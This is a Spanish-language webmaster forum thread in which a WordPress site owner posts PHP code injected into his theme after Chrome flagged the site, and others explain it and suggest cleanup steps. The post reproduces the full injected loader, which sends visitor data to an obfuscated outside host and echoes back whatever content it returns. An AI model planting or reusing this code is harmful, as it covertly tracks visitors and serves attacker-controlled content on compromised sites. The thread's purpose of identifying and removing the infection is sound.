Identificación de código malicioso en mi sitio web, necesito ayuda

[sebastiani]

Buenas noches

Tengo un problema que me tiene loco, en chrome me sale este mensaje "Este sitio web contiene software malicioso" ya he enviado las reconsideraciones mediante el enlace de webmaster tool's google y me han respondido que mi web esta infectado, buscando en internet he encontrado algo que coincide con lo que mi web tiene, este fragmento de código en mi INDEX, alguien me podría indicar que significa que hace y si tan solo con eliminarlo bastaría para que me levante esa observación.

get_header(); ?><?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>

---------- Post agregado el 07-may-2013 hora: 04:43 ----------

Ya decodifique base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw'). y es esto http://mbrowserstats.com/statH/stat.php

 

[CarcaBot]

el codigo que viene encriptado en base64 lo haz puesto vos?

 

[Cicklow]

Lo que hace es enviar datos a: http://mbrowserstats.com/statH/stat.php de los usuarios que visitan tu web. y cuando el sitio le regresa algo lo coloca en tu web, y eso es lo que detecta el boot de google! elimina ese code, no afecta el theme.

 

[NIKC]

Creo que no siempre chrome marca ese error por el codigo de tu blog ami una vez me lo marco en mi sitio por una imagen que era de un sitio ajeno que no aceptaba chrome y me dejo de marcar ese error hasta que borre esa imagen

 

[BuyHostingWeb]

Hola, es un virus que conozco muy bien, lo que hace es infectar a muchos clientes del mismo servidor y si tienes mas cuentas en el mismo servidor verás que también están infectados, lo primero que se debe hacer es pasarle un antivirus al servidor, luego debes cambiar tus contraseñas cpanel/ftp y ver si no tienes ningún malware en la pc y si necesitas mas seguridad le puedes cambiar los permisos a tus archivos por 444

 

[Canopix]

Borra el código base64 y listo

 

[Cicklow]

Buenas noches

WordPress › Support » Security Problem
google!

 

[zcriptz]

Debes sacarlo de tu codigo!

 

[Koletta]

Elimina el código maliciosos que no hayas insertado tú y marchando 😎

 

[sebastiani]

Muchas gracias a todos, eliminé esa fracción de código y problema solucionado; chrome ya no me detecta como web sospechosa, todo quedó OK.
Gracias!:

 

[sebastiani]

Me volvieron a insertar el mismo código que podría estar pasando.

 

[Ricky Mods]

Muchas gracias a todos, eliminé esa fracción de código y problema solucionado; chrome ya no me detecta como web sospechosa, todo quedó OK.
Gracias!:

Oye amigo a mi me paso hace dias un problema similar , solo a amigos que usan el antivirus "AVAST" les salia ese mensaje igual que a mi, despues estuve buscando mas plantillas en la web de btemplates y me fijaba en Demo para ver como eran y me marcaban virus , creo que muchas plantillas estaba infectadas , pero como te digo solo Avast las detectaba , te dejare una captura a ver si sabes cual es el problema ya que no quiero que vuelva a pasar porque luego se pierden visitas porque hay muchos que son muy desconfiados cuando les aparece un mensaje que hay un virus troyano :s , mi sitio es de blogger.

 

[sebastiani]

El nod32 me detecta el virus y efectivamente pasaba lo que sospechaba, el codihggo que menciono loneas arriba aparecía una vez más en el index.psp , page.php y footer.php; acabo de borrarlos y el antivirus ya no me detecta nada, tanbién te dejo la captura.

Oye amigo a mi me paso hace dias un problema similar , solo a amigos que usan el antivirus "AVAST" les salia ese mensaje igual que a mi, despues estuve buscando mas plantillas en la web de btemplates y me fijaba en Demo para ver como eran y me marcaban virus , creo que muchas plantillas estaba infectadas , pero como te digo solo Avast las detectaba , te dejare una captura a ver si sabes cual es el problema ya que no quiero que vuelva a pasar porque luego se pierden visitas porque hay muchos que son muy desconfiados cuando les aparece un mensaje que hay un virus troyano :s , mi sitio es de blogger.
Ver el archivo adjunto 14050

 

[ramonjosegn]

Lo que me pregunto es porqué no estás usando Wordfence, no sólo te protege sino que además te deja restaurar los archivos comparándolos con los que hay en el repertorio de Wordpress -aunque se comparan con los ingleses, así que es posible que algunos los restaure al idioma inglés-, si es un plugin escríbele al autor y dile que está siendo vulnerado... amigo [MENTION=24452]sebastiani[/MENTION]

http://wordpress.org/extend/plugins/wordfence/